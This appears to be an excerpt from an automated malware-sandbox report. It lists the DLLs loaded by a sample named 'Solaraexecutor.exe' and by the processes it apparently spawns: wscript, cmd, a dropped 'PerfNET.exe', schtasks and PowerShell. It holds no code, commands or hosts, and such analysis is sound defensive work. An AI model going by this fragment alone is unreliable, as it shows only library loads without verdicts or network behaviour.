Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
